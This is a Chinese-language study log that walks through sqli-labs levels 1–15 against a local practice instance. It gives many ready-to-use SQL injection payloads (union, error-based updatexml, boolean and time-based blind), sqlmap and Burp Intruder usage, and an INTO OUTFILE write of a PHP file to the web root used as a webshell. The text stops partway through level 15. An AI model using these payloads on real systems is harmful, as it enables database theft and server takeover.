wutiangui

SQL注入实操(Less1-20)

文章目录

一、sqli-lab靶场搭建
二、通关笔记
- 1.Less-1
- - a.单引号‘
  - b.updatexml
  - c.concat
  - d.union
  - e.information_schema
  - f.GROUP_CONCAT
  - g.select 1,2
- 2.Less-2
- 3.Less-3
- - a.怎么找到注入点
  - b.判断SQL注入漏洞的类型
  - c.闭合语句
  - d.如何判断显示位
  - e.答案
- 4.Less-4
- 5.Less-5
- - a.判断注入漏洞的依据
  - b.bool注入原理
  - c.sqlmap安装和使用
  - d.盲注获取数据库长度
  - e.substr
  - f.盲注获取当前数据库名称
  - h.盲注获取当前表名称
  - i.盲注获取某个表所有列名称
  - j.盲注获取密码
- 6.Less-6
- - a.获取数据库名称
  - b.获取表信息
  - c.获取列信息
  - d.获取表内数据
- 7.Less-7
- 8.Less-8
- - a.获取数据库名称
  - b.获取表信息
  - c.获取列信息
  - d.获取表内数据
- 9.Less-9
- - a.注入点判断
  - b.字符型判断
  - c.列数判断
  - d.获取数据库名称
  - e.获取表信息
  - f.获取列信息
  - g.获取表内数据
- 10.Less-10
- - a.注入点判断
  - b.字符型判断
  - c.列数判断
  - d.获取数据库名称
  - e.获取表信息
  - f.获取列信息
  - g.获取表内数据
- 11.阶段总结
- 12.Less-11
- - a.注入点判断
  - b.字符型判断
  - c.获取数据库名称
  - d.获取表信息
  - e.获取列信息
  - f.获取表内数据
- 13.Less-12
- - a.注入点判断
  - b.获取数据库名称
  - c.获取表信息
  - d.获取列信息
  - e.获取表内数据
- 14.Less-13
- - a.注入点判断
  - b.轮子测试
  - c.获取数据库名称
  - d.获取表信息
  - e.获取列信息
  - f.获取表内数据
- 15.Less-14
- - a.注入点判断
  - b.轮子测试
  - c.获取数据库名称
  - d.获取表信息
  - e.获取列信息
  - f.获取表内数据
- 16.Less-15
- - a.注入点判断
  - b.轮子测试
  - c.获取数据库名称+burp爆破
  - d.获取表信息
  - e.获取列信息
- 17.Less-16
- - a.注入点判断
  - b.轮子测试
  - c.获取数据库名称
  - d.获取表信息
  - e.获取列信息
  - f.获取表内数据
- 18.Less-17
- - a.注入点判断
  - b.获取数据库名称
  - c.获取表信息
  - d.获取列信息
  - e.获取表内数据
- 19.Less-18
- - a.注入点判断
  - b.轮子测试
  - c.获取数据库名称
  - d.获取表信息
  - e.获取列信息
  - f.获取表内数据
- 20.轮子模式总结
- 21.Less-19
- - a.注入点判断
  - b.轮子测试
  - c.获取数据库名称
  - d.获取表信息
  - e.获取列信息
  - f.获取表内数据
- 22.Less-20
- - a.注入点判断
  - b.轮子测试
  - c.获取数据库名称
  - d.获取表信息
  - e.获取列信息
  - f.获取表内数据
三、python读取网页返回工具

一、sqli-lab靶场搭建

下载路径：https://www.hibugs.net/hi-resource/sqli-labs-master.zip
下载后解压复制到www目录，然后进入sql-connections

文本编辑db-creds.inc，填写数据库密码

pikachu的php版本改为7以下

然后打开网页安装数据库

安装成功的界面如下

接下来就可以进入靶场了

二、通关笔记

1.Less-1

输入?id=1时

发现?id=1到?id=14都有数据

a.单引号‘

sql注入加单引号的缘由是为了让sql语句产生毛病，从而得知其有无过滤措施，例如：
一开始SQL语句是这样的：
select * from users where id=‘1’
当你加了单引号后变成了这样：
select * from users where id=‘1’’
这样是不符合sql语法规则的，因此会报错，若没报错，说明有多是被过滤掉或有其他防护手段。
接下来尝试让它报错，加个引号试下

发现14在错误信息里一起出来了
接下来先学习一个报错注入函数

b.updatexml

updatexml(xml_doument,XPath_string,new_value)
第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc
第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。
第三个参数：new_value，String格式，替换查找到的符合条件的数据

c.concat

第二个函数是字符串拼接concat

显然把用户名和~连接起来了
select updatexml(1,concat(0x7e,(SELECT user())),0x7e);

报错说明是参数2出现xpath注入，而且把数据库名也带在报错信息里了，因此我们可以利用这个漏洞进行注入
接下来继续学习一个方法，union

d.union

union会自动压缩多个结果集合中重复的结果，使结果不会有重复行，union all 会将所有的结果共全部显示出来，不管是不是重复。
union：会对两个结果集进行并集操作，不包括重复行，同时进行默认规则的排序。
如果要合并两个结果集，那么他们的列数必须相同

而select updatexml(1,concat(0x7e,(SELECT user())),0x7e)的结果是一行一列
而http://127.0.0.1:9009/Less-1/?id=14’的结果也是一行一列，因此可以合并
合并后应该是2行一列，把结果二放在最后一行

使用联合注入的方法居然出来了
1’ union select updatexml(1,concat(0x7e,(SELECT user())),0x7e)’

但是实际上不是，是直接抛出后面的错误了

可以发现不管是在前面还是后面，都是抛出同样的错误，说明只要有报错，就直接抛出报错信息，不合并
先这样猜想，后面再验证下是不是

现在我们拿到了当前数据库名，接下来我们需要这个数据库里有哪些表

e.information_schema

SELECT table_name FROM information_schema.tables WHERE table_schema = ‘security’;
使用information_schema可以查询到指定数据库有哪些表

f.GROUP_CONCAT

GROUP_CONCAT函数可以将多行结果集拼接成一个字符串

现在我们把这个方法用到靶场里
SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’;

g.select 1,2

14’ union select 1,2,updatexml(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’)),0x7e)’
加入1，2是为了凑显示位，以后可以用这种方法找出需要的列数
执行成功了

但是发现这里表名显示不全，估计是因为updatexml的原因，看下能否不用它显示出来
-1’ union select 1,2, GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’ ’
h.id=-1
把 id修改成-1说明左边的结果查不到，然后腾出显示位给右边的结果集

接下来呢，我们当然要看user里的数据，在此之前我们先找出user里有哪些列名
select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security”;

-1’ union select 1, 2, group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security”’

现在我们知道了users的列名，接下来当然是查出数据了

i.–+
–+把后面的 ’ LIMIT 0,1 给注释掉了
-1’ union select 1,2, group_concat(username, ‘:’, password) from users --+

2.Less-2

这一关和第一关几乎一样，只是需要把单引号去掉
获取数据库名
1 union select updatexml(1,concat(0x7e,(SELECT database())),0x7e)

获取表名
-1 union select 1,2, GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’

获取列名
-1 union select 1, 2, group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security”

获取用户名密码
-1%20 union select%20 1,2, group_concat(username, ‘:’, password) from users --+

3.Less-3

a.怎么找到注入点

在我们可控的输入部分加一些符号，查看页面是否正常
www.example.com/index.php?id=1,这里的id变量是用户可控的
如何判断是否存在sql注入？
“加引号”法无论字符型还是整型都会因为单引号个数不匹配而报错
（如果未报错，不代表不存在 Sql 注入，因为有可能页面对单引号做了过滤，这时可以使用判断语句进行注入。）

直接加’说明存在注入点

b.判断SQL注入漏洞的类型

方法1：
id=1 order by 9999 --+
如果正确返回页面，则为字符型
否则，为数字型
字符型执行的sql语句为select * from user where id=‘1 order by 9999 --+’,注释符【- -】实际上在执行的时候，被当成id的一部分，也就是说，在执行sql语句的时候，条件是id=‘1 order by 9999 --+’。最终只会截取前面的数字，返回id=1的结果。
如果是数字型的话，执行的sql语句为select * from user where id=1 order by 9999 --+,在现实生活中，根本就没什么可能会存在有9999个字段的表，所以会报错。
方法2：
url中输入？id=1 and 1=1 页面依旧正常运行，继续下一步
url中输入？id=1 and 1=2 页面运行错误，则说明此 Sql 注入为数字型注入。
方法3：
url中输入1’ and ‘1’ = ‘1,页面运行正常，继续进行下一步。
url中继续输入1’ and ‘1’ = '2,页面运行错误，则说明此 Sql 注入为字符型注入。

第1关是字符型

第2关是数字型

第3关还是字符型

c.闭合语句

单引号/双引号，注释
数字型的注入，不需要闭合就可以直接进行注入。（如果系统做了数字型传入的判断，就防止注入）如上面的第2关
字符型的注入，$id多为字符型输入，需要进行闭合
注释–+的目的：为了过滤掉多余的字符不让它影响我们构造的sql语句执行
通过闭合跟注释，构造出了一段空区域，这段空白区域可以由我们自己构造注入语句去代入到数据库执行。（查询数据库，表，字段）

d.如何判断显示位

方法1
order by n 排序
www.example.com/index.php?id=1’ order by n –
如果说n=3的时候页面正常，n=4的时候页面显示不正常，则可以判断出3个字段。
方法2
通过联合查询的方式判断哪些是显示字段
www.example.com/index.php?id=0’ union select 1,2,3 #
通过报错分析过滤点

#猜测试sql语句
select Login_name,Password from table_name where id = (‘ID’) limit 0,1;
第三关猜测id那里被加了(“id”)，尝试添加)闭合

e.答案

1 ') union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
获取数据库名(记住字符型后面需加注释–+)

获取表名
-1’) union select 1,2, GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’ --+

获取列名
-1’) union select 1, 2, group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security” --+

获取用户名密码
-1’) union select%20 1,2, group_concat(username, ‘:’, password) from users --+

4.Less-4

发现加引号并没报错，那应该怎么注入呢

发现需要用双引号才能触发错误

结合上题的经验
获取数据库名
1 ") union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+

获取表名
-1") union select 1,2, GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’ --+

获取列名
-1") union select 1, 2, group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security” --+

获取用户名密码
-1") union select%20 1,2, group_concat(username, ‘:’, password) from users --+

5.Less-5

获取数据库名
1’ union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+

但是获取表名时没有显示位
-1’ union select 1,2, GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’

a.判断注入漏洞的依据

b.bool注入原理

当我们输入id=1 和id=15时页面返回You are in和不返回的提示，我们得到的信息很少。这和之前的联合注入有很大的不同。


$username = $_POST['username'];
$password = md5($_POST['password']);

//准备sql查询
$sql = "select * from users where username='{$username}' and password='{$password}' limit 0,1";
//执行sql
$result = mysql_query($sql);
//取得一行结果
$row = mysql_fetch_array();
if(empty($row)){
	echo "用户名或密码不存在";
}else{
	echo "登录成功";
}

上面不会显示结果，但是只有两种状态，就是成功和失败。这们通过这种两种状态来进行获取数据库内容的方试就叫bool注入
如以下的验证方式，正常通过是这样的
而bool条件中有一个为假则不返回
接下来我们需要用到一个工具来对付bool盲注，就是sqlmap
先看下怎么安装

c.sqlmap安装和使用

下载路径 https://sqlmap.org/
然后cmd下执行命令
python sqlmap.py http://127.0.0.1:9009/Less-5/?id=14 --current-db --dump --batch开始渗透
发现已经可以全部查出来了
 现在我们不使用工具，只是单纯使用url和sql语句，看能否爆出数据

我们知道原先数据库里有12个数据库
那么我们怎么知道当前用的是哪个数据库，以及数据库长度，数据库名称呢
我们知道sql里可以这样查出来

那么怎么在url里盲注验证这个结果呢

d.盲注获取数据库长度

通过以下方法逐个试出数据长度
id=14’ and length(database())=8 --+

知道了长度有啥用呢，再猜下数据库首字母吧

e.substr

这里我们需要学习一个新的函数，substr
作用是：从一个内容中，按照指定条件，「截取」一个字符串。这个内容可以是数值或字符串。
用法：substr(obj，start，length)注意start是从1开始，不是从0
所以我们用这个方法获得数据库首字母

f.盲注获取当前数据库名称

14’ and substr(database(), 1, 1)=‘s’ --+
通过这个方法我们得知数据库第一个字母是s

当然我们还可以继续试第二个字母，第三个字母…，直到把8个字母全部试出来

通过上面逐个字母的测试，我们终于知道了数据库名称是security
但是这种方法是不是觉得有点笨，有没有循环试错的方法呢
有的，这是我写的存储过程

delimiter //                            #定义标识符为双斜杠
drop procedure if exists test;          #如果存在test存储过程则删除
create procedure test()                 #创建无参存储过程,名称为test
begin
   declare i int;
   declare j int;
   declare name VARCHAR(255);
   set j = 1;
   set name = "";
   while j <= 8 do
      set i = 0;
      while i < 26 do                     #结束循环的条件: 当i大于26时跳出while循环 
         if(substr(database(), j, 1)=CHAR(ascii('a')+i)) THEN
            set name  = concat(name, CHAR(ascii('a')+i));
            select name, CHAR(ascii('a')+i);
         END IF;  
	     set i = i + 1;
      end while; 
      set j = j + 1;
   end while;                          #结束while循环
   select * from test;
   SELECT name;
end 
//                                      #结束定义语句
delimiter ;
call test();

你看，是不是一次性全都查出来了但是怎么让它在页面里执行呢，感觉有点难度

接下来我们需要用同样的方法爆出表长度，表名称

h.盲注获取当前表名称

首先还是猜出长度，经验是可以先使用>,<之类的先圈定范围，然后再使用=，其实后面的字母枚举也可以用这种方法
14’ and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1)) =29 --+

知道了长度接下来就是爆出这段字符串了
14’ and substr(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1), 1, 1)=‘e’ --+

http://127.0.0.1:9009/Less-5/?id=14’ and substr(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1), 2, 1)=‘m’ --+

后面的操作都一样的，在此不加赘述

i.盲注获取某个表所有列名称

比如我们需要知道users这个表里有哪些列
那么用盲注的方法该怎么拿到呢

一样的逻辑，先爆出长度
14’ and length(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security”), 1)) =20 --+

然后逐个猜出字符
14’ and substr(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security”), 1), 1, 1)=‘i’ --+

14’ and substr(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security”), 1), 2, 1)=‘d’ --+

j.盲注获取密码

密码里居然有特殊符号，而且这么长，看来不用工具做是不行了
老办法，还是先搞长度
14’ and length(substr((select group_concat(username, ‘:’, password) from users), 1)) =188 --+
天哪长度188
Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
用word算下也确实如此

接下来我打算用第三节自己开发的工具爆破出这一大段文字密码

当个枚举语法是
14’ and substr(substr((select group_concat(username, ‘:’, password) from users), 1), $d 1, 1) =$ d2 --+
替换进去，并把长度改成188，运行一下看看

好家伙，uil1.txt就写了1m多，没关系，先看下结果，虽然还没全部跑完，但是前面这几个全都对上了

至此该关卡结束

6.Less-6

第6关也是盲注
但是发现一个问题，就是加单引号不管加几个页面都没变化，怀疑是不是有延时盲注

a.获取数据库名称

1 " union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+

不是时间盲注，只是必须id那里用双引号而已

b.获取表信息

14" and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1)) =29 --+
同样的，用我的工具跑一次
url = "127.0.0.1:9009/Less-6/?id=14\” and substr(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1), "

结果完全正确

c.获取列信息

14" and length(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security”), 1)) =20 --+

url = “127.0.0.1:9009/Less-6/?id=14” and substr(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’), 1), "

d.获取表内数据

14" and length(substr((select group_concat(username, ‘:’, password) from users), 1)) =188 --+

url = “127.0.0.1:9009/Less-6/?id=14” and substr(substr((select group_concat(username, ‘:’, password) from users), 1), "
j = ‘a’
fp = open(“url1.txt”, “w”)
#21是目标长度
writeurl(fp, url, “, 1)=”, “–+\n”, 188+1)
显然，全都正确

7.Less-7

第7关彻底连数据库名称也拿不到了

127.0.0.1:9009/Less-7/?id= 14’ or 1=1 --+
发现id后面加’号界面呈周期性变化，证明存在sql注入
但是or或者and不管是真是假都没用，只看id那里的真假
那么怎么构造轮子呢，这关太恶心了，不单id有两个括号，后面也被加了两个括号

14’)) and length(database())=8–+((
使用order by判断列数14’)) order by 4 --+

这里一直说use outfile是啥意思呢，应该是个新的知识点，只能网上先查下了
网上查了说是可以通过联合注入上传，但是我这边根本上传不了，查了下
show variables like ‘%secure%’;

secure_file_priv NULL说明是禁止上传，怎么改这个设置呢

方法是找到phpstudy安装路径下的这个地方，打开my.ini
如果存在secure_file_priv就将其修改为secure_file_priv=“”
若不存在添加secure_file_priv=""即可
然后重启mysql,再查发现没了

1’)) union select 1,2,“” into outfile “D:\phpstudy_pro\WWW\sqli-labs-master\Less-7\hyc.php” --+
然后我们再去页面看下能否上传
居然成功了

好，用菜刀连下，居然也成功了，不过这个条件太苛刻了，估计也只有这个例子可用了
1，show variables like ‘%secure%’;用来查看mysql是否有读写文件的权限
2，数据库的file权限规定了数据库用户是否有权限，向操作系统内写入和读取已存在的权限
3，into outfile命令使用的环境：必须知道一个，服务器上可以写入文件的文件夹的完整路径

8.Less-8

第8关加单引号存在周期性报错，说明id处存在sql注入点

使用1 order by 9999 --+检测发现是字符型

继续判断列数1’ group by 3 --+，发现列数为3

期间任何输入输出只有You are in…或空两种情况，说明存在sql盲注可能性

a.获取数据库名称

使用14’ and length(database())=8–+获取数据库名称长度时发现id处没有过滤

使用工具爆破下数据库用户名
url = "127.0.0.1:9009/Less-8/?id=14’ and substr(substr((database()), 1), "
writeurl(fp, url, “, 1)=”, “–+\n”, 8+1)

b.获取表信息

14’ and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1)) =29 --+

爆破表名
"127.0.0.1:9009/Less-8/?id=14’ and substr(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1), "

c.获取列信息

14’ and length(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security”), 1)) =20 --+

url = "127.0.0.1:9009/Less-8/?id=14’ and substr(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’), 1), "

d.获取表内数据

14’ and length(substr((select group_concat(username, ‘:’, password) from users), 1)) =188 --+

url = "127.0.0.1:9009/Less-8/?id=14’ and substr(substr((select group_concat(username, ‘:’, password) from users), 1), "

比对下,除了全部是小写之外其他全部正确

9.Less-9

第9关有点奇怪，怎么输页面都没变化

只能借助bp看字段长度了

发现报错时长度是974，正常时937

a.注入点判断

那好，现在先看下注入点是否有变化，发现加单引号没任何变化
但是加’)–+后发现有变化了，猜测原id被加了括号，而且是字符型，(‘id’)

b.字符型判断

用1 order by 9999 --+检测一下确实是字符型

c.列数判断

1’ group by 3 --+检验一下列数发现是3列

接下来看看能否获取数据库名称长度

d.获取数据库名称

14’ and length(database())=8–+，还真可以，说明是8

看下字母枚举14’ and substr(substr((database()), 1), 1, 1)=‘s’–+，长度响应确实对了，但是页面一直没刷新怎么办呢，不然工具都没法抓数据，或者工具里增加一个功能，获取返回的长度，如果内容没变化就看长度，当然事先需要给工具告知一个正确的长度，这样它知道怎么找

找长度，其实就是提取这个值

所以接口方法应该是类似
def getlength(text, value):
text是html网页内容
value是正确的长度，这里是707
结果是返回正确还是错误长度
工具里增加一个分支，使用该分支爆破结果也出来了
url = "127.0.0.1:9009/Less-9/?id=14’ and substr(substr((database()), 1), "

e.获取表信息

14’ and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1)) =29 --+
出现937说明29正确

爆破表名
url = "127.0.0.1:9009/Less-9/?id=14’ and substr(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1), "

表名也爆破出来了

f.获取列信息

14’ and length(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security”), 1)) =20 --+
出现937说明列长度是20

爆破列名
url = "127.0.0.1:9009/Less-9/?id=14’ and substr(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’), 1), "

g.获取表内数据

14’ and length(substr((select group_concat(username, ‘:’, password) from users), 1)) =188 --+
出现937说明长度是188
url = "127.0.0.1:9009/Less-9/?id=14’ and substr(substr((select group_concat(username, ‘:’, password) from users), 1), "
完全正确

10.Less-10

终于到第10关了，看下这关有什么陷阱
http://127.0.0.1:9009/Less-10/?id=15
和上一关一样的模式？发现正确长度是939

a.注入点判断

至对”敏感，说明存在注入点
http://127.0.0.1:9009/Less-10/?id=14 “

b.字符型判断

用1 order by 9999 --+检测一下确实是字符型

c.列数判断

1" group by 3 --+检验一下列数发现是3列

d.获取数据库名称

1" and length(database())=8–+

说明长度是8
爆破数据库名称，记得要将长度改成709

url = “127.0.0.1:9009/Less-10/?id=14” and substr(substr((database()), 1), "

e.获取表信息

14” and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1)) =29 --+
出现939说明长度是29

表名爆破
url = “127.0.0.1:9009/Less-10/?id=14” and substr(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1), "

f.获取列信息

14” and length(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security”), 1)) =20 --+
出现939说明正确长度是20

列名爆破
url = “127.0.0.1:9009/Less-10/?id=14” and substr(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’), 1), "

g.获取表内数据

14” and length(substr((select group_concat(username, ‘:’, password) from users), 1)) =188 --+
出现939说明长度是188

表数据爆破
url = “127.0.0.1:9009/Less-10/?id=14” and substr(substr((select group_concat(username, ‘:’, password) from users), 1), "

11.阶段总结

前10关终于做完了，告一段落，先总结一下
首先拿到站点，先判断一下是否存在注入，用’之类的方法判断其敏感性，注意有些需要加)之类的闭合,然后看情况换成”
其次用1 order by 9999 --+判断是字符型还是数字型
接着用1’ group by 3 --+判断列数，即显示位
用1’ and length(database())=8–+判断数据库名称长度
用id=14’ and substr(substr((database()), 1), "爆破数据库名

用id=14’ and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1)) =29 --+
判断表名长度
用id=14’ and substr(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1), " 爆破表名

用14’ and length(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security”), 1)) =20 --+
判断列名长度
用id=14’ and substr(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’), 1), "爆破列名

用14’ and length(substr((select group_concat(username, ‘:’, password) from users), 1)) =188 --+
判断表数据长度
用id=14’ and substr(substr((select group_concat(username, ‘:’, password) from users), 1), "爆破数据

12.Less-11

显然这关不能再在url里注入了，怎么输都没变化
那么看来只能从输入框注入了

a.注入点判断

发现用户框或密码框存在注入,加单引号呈现周期性报错

b.字符型判断

用1 order by 9999 --+分别检测一下确实都是字符型

c.获取数据库名称

用户框输入
1’ union select updatexml(1,concat(0x7e,(SELECT database())),0x7e)
密码框输入’ 1

看来这个不是盲注了

d.获取表信息

用户框输入，同时通过select 1,2之类的尝试测试出显示位
1’ union select 1, GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’
密码框输入’1,前面的单引号起到和前面闭合的作用

表名没输出来，但是提示登录成功了，啥情况,猜测这里还是只能用报错注入updatexml
用户名输入
1’ union select 1, updatexml(1, (select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’ ), 0x7e)
密码还是’1

结果出来了，但是显示不全，看来用updatexml就是有这个毛病
查下updatexml有没有完整输出的方法
用户名
1’ union select 1, updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’ limit 0,1),0x7e), 0x7e)

这样居然全都拿到了
其实还有一个逐个提取分页显示的方法
用户名输入
1’ union select 1, updatexml(1, concat(0x7e,(select table_name FROM information_schema.tables WHERE table_schema = ‘security’ limit 0,1), 0x7e),1)

然后逐个增加上图0这个数字用于切换行数

e.获取列信息

这次我们就直接提取了，用户名直接输入
1’ union select 1, updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security” limit 0,1),0x7e), 0x7e)

f.获取表内数据

1’ union select 1, updatexml(1, concat(0x7e,(select group_concat(username, ‘:’, password) from users limit 0,1),0x7e), 0x7e)

看来还是得分页提取
用户名输入
1’ union select 1, updatexml(1, concat(0x7e,(select concat(username, ‘:’, password) from users limit 0,1), 0x7e),1)

然后逐个修改0的数值

然后我们用获取到的这第11个用户名密码登录下，发现登录成功了，ok，本关结束

13.Less-12

a.注入点判断

发现对双引号敏感，用户名密码存在sql注入

b.获取数据库名称

1" union select updatexml(1,concat(0x7e,(SELECT database())),0x7e)
但是报错了

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘union select updatexml(1,concat(0x7e,(SELECT database())),0x7e)") and password=(’ at line 1
通过这个报错信息我们能发现什么呢，猜测传进去的数值应该都被括号()包裹起来了
先试下用户名输入1" ) --+(，密码输入”发现没报错，然后再试
1" ) union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+(

说明下，这里第一个)起到闭合用户名的作用，第二个(闭合密码，然后中间空出来的这段就留给我们注入了

c.获取表信息

知道了轮子(结构)，试下看下能否直接替换
用户名输入
1" ) union select 1, updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’ limit 0,1),0x7e), 0x7e) --+(

d.获取列信息

用户名输入
1" ) union select 1, updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security” limit 0,1),0x7e), 0x7e)–+(

e.获取表内数据

用户名输入
1" ) union select 1, updatexml(1, concat(0x7e,(select concat(username, ‘:’, password) from users limit 0,1), 0x7e),1)–+(

1" ) union select 1, updatexml(1, concat(0x7e,(select concat(username, ‘:’, password) from users limit 12,1), 0x7e),1)–+(

Ok，这关结束

14.Less-13

a.注入点判断

两个输入框都对’敏感，说明存在sql注入点

b.轮子测试

接下来测试轮子
用户名输入1’) --+(，密码输入’发现没有报错，猜测这就是轮子

c.获取数据库名称

在轮子的基础上用户名输入
1’) union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+(

d.获取表信息

在轮子的基础上用户名输入
1’) union select 1, updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’ limit 0,1),0x7e), 0x7e) --+(

e.获取列信息

在轮子的基础上用户名输入
1’) union select 1, updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security” limit 0,1),0x7e), 0x7e) --+(

f.获取表内数据

在轮子的基础上用户名输入
1’) union select 1, updatexml(1, concat(0x7e,(select concat(username, ‘:’, password) from users limit 0,1), 0x7e),1) --+(

发现这里拿到的用户名每个都可以登录，应该改成特定关卡用特定用户名密码才对

15.Less-14

a.注入点判断

又是双引号

b.轮子测试

这个不会这么简单吧，直接就让我找到了，轮子：1" --+

c.获取数据库名称

在轮子的基础上用户名输入
1" union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+

d.获取表信息

在轮子的基础上用户名输入
1" union select 1, updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’ limit 0,1),0x7e), 0x7e) --+

e.获取列信息

在轮子的基础上用户名输入
1" union select 1, updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security” limit 0,1),0x7e), 0x7e) --+

f.获取表内数据

在轮子的基础上用户名输入
1" union select 1, updatexml(1, concat(0x7e,(select concat(username, ‘:’, password) from users limit 0,1), 0x7e),1) --+

16.Less-15

a.注入点判断

15关看来是盲注无疑了，界面上测什么都没有响应，只有输入正确的bool语句才行
但是在输入框里做盲注怎么测呢
网上查了下资料说这关需要用到时间盲注了，终于用到了，可是怎么用呢，用户名里输入
1’ and if(1=2, 1, ,sleep(1))
可是怎么测试也不行，这里根本看不到有延时的样子，咋回事呢

但是发现下面这种情况有延时
admin’ and sleep(0.5)#

b.轮子测试

用户名输入
admin’ and if(1=1, sleep(0.5), 1)#，密码1

admin’ and if(1=2, sleep(0.5), 1)#，密码1

故该轮子可用，以延时时间作为正确与否的判断依据

c.获取数据库名称+burp爆破

在轮子的基础上用户名输入
admin’ and if(length(database())=8, sleep(1), 1)#

admin’ and if(length(database())=7, sleep(1), 1)#

说明数据库长度是8
用户名输入
admin’ and if(substr(substr((database()), 1),1,1) = ‘s’, sleep(1), 1)#

说明第一个字母是s
但是接下来怎么办呢，一个一个字母试吗，效率太低了，工具能获得时间吗，只能试下了
我们先用burp试下
比如以
admin’ and if(substr(substr((database()), 1),1,1) = ‘s’, sleep(1), 1)#为例
抓包拦截，将其发送到Intruder,先设置’s’这个参数

Payload里选择我们预先准备好的字符字典

字典里包括一些常见的特殊字符
Option里重定向选always

资源池resource pool设置单线程

然后开始attack,如果正确的话应该能发现最长响应时间是’s’
看响应时间记得勾选这个completed

果然是s

比如第二个字母应该是e,现在可以得出一个结论，burp里正确的length发现都是1677可以据此找出是否找到

接下来我们批量扫下，把8个字母全部一起扫出来

第一个payload

第二个和之前设的一样，还是自定义字符，这是爆破结果，如果发现顺序有点不一样，先点下payload1，再点下点Length就行

好了，至此burp也可以用以实战了

d.获取表信息

在轮子的基础上用户名输入
admin’ and if(length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1)) =29, sleep(1), 1)#

而用admin’ and if(length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1)) =28, sleep(1), 1)#

说明表长度是29
在轮子的基础上用户名输入
admin’ and if(substr(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1),1,1) = ‘s’, sleep(1), 1)#
用burp批量爆破下
第一个payload长度记得设置成29，以下是爆破结果

可以发现和正确答案一模一样

e.获取列信息

在轮子的基础上用户名输入
